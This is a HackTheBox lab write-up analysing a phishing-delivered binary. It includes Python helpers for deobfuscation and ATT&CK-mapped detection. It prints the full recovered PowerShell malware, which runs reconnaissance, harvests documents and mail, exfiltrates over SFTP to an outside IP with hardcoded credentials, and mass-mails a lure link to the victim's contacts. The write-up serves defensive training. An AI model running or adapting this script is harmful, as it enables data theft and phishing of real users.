HackTheBox Heartbreaker-Continuum

Preface
Clearing the fog of malware analysis: answer the official questions and understand how this malware works.
Background
Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
Task 1
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
VirusTotal provides a lot of information about this sample.
Task 2
When was the binary file originally created, according to its metadata (UTC)?

Task 3
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

Task 4
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

Task 5
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
Here a hex editor is enough to spot it; real-world malware may require all sorts of reverse engineering.
Task 6
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
After extracting the code, you can see string reversal, Base64 and string concatenation. Since the question asks about the encoding, the answer is Base64.
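As an added example (not part of the original writeup), a Python helper that does what Task 5 and Task 6 ask for on a constructed stand-in binary: it locates the first run of concatenated quoted Base64 fragments and reports its hex offset, then undoes the concatenation, the string reversal and the Base64. The layer order (Base64 first, then reversed, then split into "+"-joined literals), the UTF-8 text encoding and the fake header bytes are assumptions made for the fixture, not facts about the real sample.

```python
import base64
import re


def obfuscate(script: str, chunk: int = 12) -> str:
    """Fixture builder only: Base64, reverse, then split into '+'-joined PowerShell
    string literals. Layer order and UTF-8 are assumptions, not the real sample's."""
    b64 = base64.b64encode(script.encode("utf-8")).decode()[::-1]
    parts = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return "+".join(f'"{p}"' for p in parts)


# A run of quoted Base64 fragments joined with '+' is the shape we scan for.
B64_FRAG = rb'"[A-Za-z0-9+/=]+"'
CONCAT_RE = re.compile(B64_FRAG + rb'(?:\s*\+\s*' + B64_FRAG + rb')+')


def locate_payload(blob: bytes):
    """Return (hex offset, raw bytes) of the first concatenated-Base64 run, or None."""
    m = CONCAT_RE.search(blob)
    return (f"0x{m.start():X}", m.group(0)) if m else None


def deobfuscate(raw: bytes) -> str:
    """Strip quotes and '+', undo the reversal, then Base64-decode to the script."""
    joined = "".join(re.findall(r'"([A-Za-z0-9+/=]+)"', raw.decode("ascii")))
    return base64.b64decode(joined[::-1]).decode("utf-8")


def recover(blob: bytes):
    """Offset and plaintext of the embedded script, or None if no payload is found."""
    hit = locate_payload(blob)
    if hit is None:
        return None
    offset, raw = hit
    return offset, deobfuscate(raw)


# Constructed stand-in binary: fake header, the obfuscated script, trailing padding.
SAMPLE_SCRIPT = ('$img = "C:\\users\\$env:USERNAME\\Downloads\\Superstar_MemberCard.tiff"\n'
                 'Invoke-WebRequest -Uri $url -OutFile $img')
BLOB = b"MZ\x90\x00" + bytes(60) + b"$p = " + obfuscate(SAMPLE_SCRIPT).encode("ascii") + bytes(8)

if __name__ == "__main__":
    print(recover(BLOB))
```

On the fixture the payload starts at 0x45; on a real sample the same scan gives the offset that Task 5 asks for, provided the fragments use the same quoting.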
Task 7
What is the specific cmdlet utilized that was used to initiate file downloads?
The recovered malicious code (stage comments added for reading; the code itself is unchanged):
# --- Stage 1: download and open the decoy image (Task 7) ---
$hostname = $env:COMPUTERNAME
$currentUser = $env:USERNAME
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"
$img = "C:\users\$currentUser\Downloads\Superstar_MemberCard.tiff"
Invoke-WebRequest -Uri $url -OutFile $img
Start-Process $img

# --- Stage 2: host and domain reconnaissance written into the staging directory (Task 9) ---
$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"
if (-not (Test-Path -Path $targetDir -PathType Container)) {
    New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}
$currentUser | Out-File -FilePath (Join-Path $targetDir 'username.txt') -Force
nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force
Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force
wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force
$currentUserProcesses = Get-WmiObject Win32_Process | Where-Object {
    try {
        $_.GetOwner().User -eq $currentUser
    } catch {
        $false
    }
}
$currentUserProcesses | Select-Object ProcessName, ProcessId | Out-File -FilePath (Join-Path $targetDir 'UserProcesses.txt') -Force
if (Get-Process -Name Outlook -ErrorAction SilentlyContinue) {
    Stop-Process -Name Outlook -Force -ErrorAction SilentlyContinue
}

# --- Stage 3: automated collection of documents and mail files, then archiving (Task 10) ---
$extList = "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx",
    "*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst", "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"
$null = Get-ChildItem $searchDir -Recurse -Include $extList -Force -ErrorAction 'SilentlyContinue' |
    ForEach-Object {
        $destinationPath = Join-Path $targetDir $_.Name
        if ($_.FullName -ne $destinationPath) {
            Copy-Item -Path $_.FullName -Destination $destinationPath -Force
        }
    }
Get-SmbShare | Out-File -FilePath (Join-Path $targetDir 'Shareinfo.txt') -Force
gpresult /r | Out-File -FilePath (Join-Path $targetDir 'GPinfo.txt') -Force
$ProgressPreference = 'SilentlyContinue'
$archivePath = "$targetDir\$hostname.zip"
Compress-Archive -Path $targetDir -DestinationPath $archivePath -Force

# --- Stage 4: exfiltration of the archive over SFTP using a portable WinSCP (Task 11) ---
$wZipUrl = "https://us.softradar.com/static/products/winscp-portable/distr/0/winscp-portable_softradar-com.zip"
$wZipFile = "$targetDir\WinSCP.zip"
$wExtractPath = "C:\Users\Public\HelpDesk-Tools"
Invoke-WebRequest -UserAgent "Wget" -Uri $wZipUrl -OutFile $wZipFile -UseBasicParsing
Expand-Archive -Path $wZipFile -DestinationPath $wExtractPath -Force
$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow

# --- Stage 5: internal spearphishing via Outlook COM, BCC to every contact ---
$outlookPath = Get-ChildItem -Path "C:\Program Files\Microsoft Office" -Filter "OUTLOOK.EXE" -Recurse | Select-Object -First 1 -ExpandProperty FullName
$htmlBody = @"
<!DOCTYPE html>
<html>
<head>
<style>
body {
font-family: Calibri, sans-serif;
}
</style>
</head>
<body>
<p>Hey, </p> <p> Hope you're doing great when you see this. I'm reaching out because there's something I've been wanting to share with you. You know that feeling when you've been admiring someone from afar, but hesitated to take the next step? That's been me lately, but I've decided it's time to change that.</p>
<p>In a world where we often rush through everything, I believe in the beauty of taking things slow, cherishing each moment like a scene from a timeless tale. So, if you're open to it, I'd love for us to meet up after hours.</p>
<p>I've arranged for a rendezvous at a private membership club, where we can enjoy a bit of privacy and exclusivity. I've attached the map for your convenience. </p>
<p>To gain entry, you'll need a digital membership card for entry, accessible <a href='http://44.206.187.144:9000/Superstar_MemberCard.tiff.exe'>here</a>. Just a friendly heads up, there's a time limit before you can download it, so it's best to grab it sooner rather than waiting too long.</p>
<p>Counting on seeing you there later.</p>
</body>
</html>
"@
if ($outlookPath) {
    Start-Process -FilePath $outlookPath
    $outlook = New-Object -ComObject Outlook.Application
    $namespace = $outlook.GetNamespace("MAPI")
    $contactsFolder = $namespace.GetDefaultFolder(10)
    $csvFilePath = "$targetDir\Contacts.csv"
    $contactsFolder.Items | ForEach-Object {
        $_.GetInspector | ForEach-Object {
            $_.Close(0)
        }
        $props = @{
            'Full Name' = $_.FullName
            'Email Address' = $_.Email1Address
        }
        New-Object PSObject -Property $props
    } | Export-Csv -Path $csvFilePath -NoTypeInformation
    $contacts = Import-Csv -Path $csvFilePath
    $mailItem = $outlook.CreateItem(0)
    $mailItem.Subject = "Fingers crossed you'll notice.."
    $mailItem.HtmlBody = $htmlBody
    $mailItem.Attachments.Add($img) > $null
    $mailItem.BodyFormat = 2
    foreach ($contact in $contacts) {
        $bccRecipient = $mailItem.Recipients.Add($contact."Email Address")
        $bccRecipient.Type = [Microsoft.Office.Interop.Outlook.OlMailRecipientType]::olBCC
    }
    $mailItem.Recipients.ResolveAll() > $null
    $mailItem.Send()
}

# --- Stage 6: cleanup of the tooling and staging directories ---
Remove-Item -Path $wExtractPath -Recurse -Force
Remove-Item -Path $targetDir -Recurse -Force
The cmdlet used for the downloads is visible in the script:
Invoke-WebRequest -Uri $url -OutFile $img
Task 8
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
CyberChef can extract the IPs directly.
Task 9
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
Reading the malicious code shows:
$targetDir = "C:\Users\Public\Public Files"
Task 10
What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
When executed, the malicious code automatically collects all kinds of user information and files. According to https://attack.mitre.org/tactics/TA0009/ this is T1119.
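Added example (not from the writeup): detection logic that maps the commands the recovered script runs to the stages above and to ATT&CK technique IDs, with T1119 attached to use of the staging directory from Task 10, and runs it over constructed process-creation events. The log format, hostnames, user name and timestamps are made up for the demo; the command lines are modelled on the script.

```python
import re

# Behaviours lifted from the recovered script, each paired with the ATT&CK
# technique it most closely matches (T1119 is the writeup's answer for Task 10).
RULES = [
    ("discovery: domain controller lookup", "T1018", re.compile(r"nltest(\.exe)?\s+/dsgetdc", re.I)),
    ("discovery: installed AV products", "T1518.001", re.compile(r"wmic.*SecurityCenter2.*AntiVirusProduct", re.I)),
    ("discovery: group policy dump", "T1615", re.compile(r"gpresult(\.exe)?\s+/r\b", re.I)),
    ("collection: staging directory used", "T1119", re.compile(r"C:\\Users\\Public\\Public Files", re.I)),
    ("collection: archive of staged files", "T1560", re.compile(r"Compress-Archive\b", re.I)),
    ("exfiltration: WinSCP scripted SFTP upload", "T1048", re.compile(r"WinSCP\.com.*/script=", re.I)),
]


def classify(command_line: str):
    """Return (label, technique) for every rule the command line triggers."""
    return [(label, tid) for label, tid, rx in RULES if rx.search(command_line)]


def triage(log_lines):
    """Parse constructed 'timestamp|host|user|command' lines; report only the hits."""
    hits = []
    for line in log_lines:
        ts, host, user, cmd = line.split("|", 3)
        for label, tid in classify(cmd):
            hits.append({"time": ts, "host": host, "user": user, "technique": tid, "label": label})
    return hits


# Constructed process-creation events in the shape the script would produce.
SAMPLE_LOG = [
    "2024-03-01T10:02:11Z|WS01|alice|nltest /dsgetdc:CORP",
    "2024-03-01T10:02:12Z|WS01|alice|wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value",
    "2024-03-01T10:02:15Z|WS01|alice|gpresult /r",
    "2024-03-01T10:02:30Z|WS01|alice|powershell Compress-Archive -Path \"C:\\Users\\Public\\Public Files\" -DestinationPath \"C:\\Users\\Public\\Public Files\\WS01.zip\"",
    "2024-03-01T10:02:40Z|WS01|alice|C:\\Users\\Public\\HelpDesk-Tools\\WinSCP.com /script=\"C:\\Users\\Public\\HelpDesk-Tools\\maintenanceScript.txt\"",
    "2024-03-01T10:03:00Z|WS01|alice|notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Several of these hits from one user within a minute or two (DC lookup, AV enumeration, archive in a Public folder, WinSCP with a script file) is the sequence worth alerting on, rather than any single command.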
Task 11
What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@
That's a wrap.